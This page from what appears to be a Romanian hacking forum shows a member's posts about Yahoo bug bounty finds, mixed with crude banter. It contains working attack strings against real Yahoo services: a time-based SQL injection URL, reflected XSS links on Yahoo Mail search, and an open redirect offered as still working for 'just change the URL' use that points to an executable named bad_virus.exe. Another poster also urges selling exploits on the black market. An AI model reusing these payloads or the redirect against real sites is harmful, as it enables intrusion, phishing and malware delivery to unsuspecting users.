Jump to content

SilenTx0

Active Members
  • Posts

    531
  • Joined

  • Last visited

  • Days Won

    14

Posts posted by SilenTx0

  1. Si ce pula mea faci acum cu vulnerabilitatea asta?

    Ca sa umpli rahatul ala de subdomeniu cu XSS nu mai e rentabil. Din cate stiu eu, nu se mai pot fura cookieuri

    Ce treaba are SQL Injection cu XSS? Dac? habar n-ave?i ce e cu voi, nu v? mai b?ga-?i s? comenta?i aiurea.

  2. Fara nici un fel de suparare sau dorinta de a creea aici un confict,dar.....

    din cauza oamenilor ca tine...care doresc sa fie ""the good guy"" cuvantul hacker/cracker/exploiter..isi vor pierde din valoare pana cand la un moment dat o sa dispara.

    Un prieten a raportat un exploit la yahoo si a primit ca rasplata:

    -un tricou cu yahoo

    -o scrisoare de multumire si bla bla bla.

    asa ca te poti considera norocos.

    Daca esti bagat in chestia asta pentru bani(ca daca nu ai fi pt asta nu ai da raport),cand gasesti un exploit vinde=l pe piata neagra sau la cunostinte din domeniu si poti face 10x ori banii aia.

    Traim intr-o lume condusa de oameni rai..iar oamenii bunii ii sterg la fund pe cei rai.

    Fiecare isi alege calea cum doreste.

    Un mare "BRAVO" pentru marele tau succes,

    Prietenul t?u a raportat vulnerabilitatea acum un an sau mai bine, când Yahoo nu avea un program de bug bounty. A?a cum am mai ?i într-un alt topic(tot legat de o vulnerabilitate în Yahoo), nu m? intereseaz? banii f?cu?i în mod ilegal. Tr?im într-o lume condus? de oameni "r?i" din cauza celor care gândesc ca tine. Nu ave?i de cât s? g?si?i vulnerabilit??i ?i s? le vinde?i unde vre?i voi.

  3. Frumos omule, felicitari! Din curiozitate, cat timp le-a luat sa iti raspunda si sa iti trimita banii?

    A durat destul de mult... Am v?zut c? nu-mi mai r?spund ?i le-am dat mail( vulnerabilitatea era "triaged" de vreo 3 luni). Mi-au spus c? au f?cut o greseala la schimbarea statusului vulnerabilita?ii (au uitat s? o marcheze ca "resolved"). Dup? ce mi-au r?spuns la mail, imediat au modificat statusul ?i ieri mi-au trimis banii.

    În total a durat cam 4-5 luni :)))

  4. Este vorba despre o vulnerabilitate SQL Injection care se putea exploata doar prin metoda Time Based.

    Exploatându-se doar prin Time Based, nu prea am ce PoC s? pun pentru c? n-am f?cut video.

    Aici a fost: https://au.totaltravel.yahoo.com/travel-ideas/galleries/g/-/24496066/1/natures-pools-in-paradise/?cmp=thomepage' if(LEN(DB_NAME())=5) WAITFOR DELAY '0:0:10'--

    Am primit o recompens? destul de frumoasa:

    diokp3w.png

    • Upvote 2
  5. Man , stiu si eu cate putin acolo dupa ce am citit mai peste tot . Si inainte sa creez un tutorial stai tu calm ca ma informez , nu scriu prostii .

    Adic? înainte s? îl copii de undeva :). Nu cred c? este vreun articol care s? î?i apar?in?.

    Dac? vrei s? ai succes, creaz? tu articole, nu le copia.

  6. o sa revin cu detalii. intre timp nu pot sa inteleg mentalitatea romanilor mancatori de cacat, hateri, etc...adica astia voi care puneti raul inainte. NU AM NIMIC DE PIERDUT BA. oamenii cica urmeaza sa imi trimita niste acte pt vize, si bilete, etc. plus ca nu voi pleca fara contact vizual ...va tin la curent. plus ca am un sentiment bun in leg cu chestia asta..si am avut ghinion toata viata. ce pula mea!

    Atunci de ce ai mai cerut parerea noastra? Doar ca sa faci un post( sau 50 din cate vad) in plus?

  7. Won't fix :)

    https://ads.yahoo.com/clk?3,eJytjdEKgjAYhZ-mOxE3Z1tIF78tQWmW0Ygu1WWm1oIE0advgdUL9HEuzuE.hx-5vuNSRhjBOM.VPM8yHxEP07JUJWKW4.smL4iD6IJiqz1rDTvFBHDRuCyAN5FMix4-JDlEk5UAKYTrxx32053KVQJ.gbMmkJM3.y5GnIGnqB07MvjVqjYZ0zEZ5bA5xleBRScOYSsGdN1yiTYHdTvVEm953Ii6IOLyXS4tq-q6x3PmwgyHRn3f20NWaW0X-mbyC-CRWOg=,$http://193.27.70.11/bad_virus.exe

    Pentru a il folosi doar modificati url de la final :)

    Ps: merge de 3 luni incoace

    Nu mai dau bani pe Open Redirect de la inceputul anului :)

  8. Dar cum au rezolvat atunci si acum ai gasit iar? :)

    Stii si tu cum sunt astia de la yahoo...

    Ei au redenumit aplicatia care facea cautarea din searchnew in search in loc sa foloseasca o functie care sa filtreze datele (Yahoo style).

    Adevarat ca daca dadeam click pe link-ul care l-am trimis in primul raport, xss-ul nu mergea dar daca bagam vectorul direct in search, functiona perfect.

    La fel am patit si cu un bug in maps.yahoo.com. Initial am primit duplicate, l-am raportat din nou si am primit valid:)).

    Link-ul dat la primul raport(duplicate): https://us-mg6.mail.yahoo.com/neo/b/searchnew?s=<img+alt="+autofocus=true+onfocus=alert(1)+a="">&fid=%40S%40Search&srchWebUrl=http://search.yahoo.com/search?fr=ush-mail&srchMail=Search+Mail

    Link-ul dat la al doilea raport(valid): https://us-mg6.mail.yahoo.com/neo/b/search?s=<img+alt="+autofocus=true+onfocus=alert(1)+a="">&fid=%40S%40Search&srchWebUrl=http://search.yahoo.com/search?fr=ush-mail&srchMail=Search+Mail

  9. :))))))))) Deci iti dau un rahat de 3,5 euro si aia virtuali (pe site-ul lor). Adica adauga 3.5 intr-o coloana a bazei de date.

    Nu-i vorba de reward, iti dai seama ca nu te poti astepta la cine stie ce recompensa de la un site de genul.

    Gestul conteaza...macar arata ca le pasa cat de cat.

  10. //Stiind ca a face bypass la htmlentities este un lucru imposibil ,uitati ca aici nu este imposibil ^_^//

    Bypass la htmlentities se poate face in unele cazuri ideale.Iin cazul tau vectorul executat nu este cel afisat prin htmlentities, n-ai facut nici un bypass stai linistit.

×
×
  • Create New...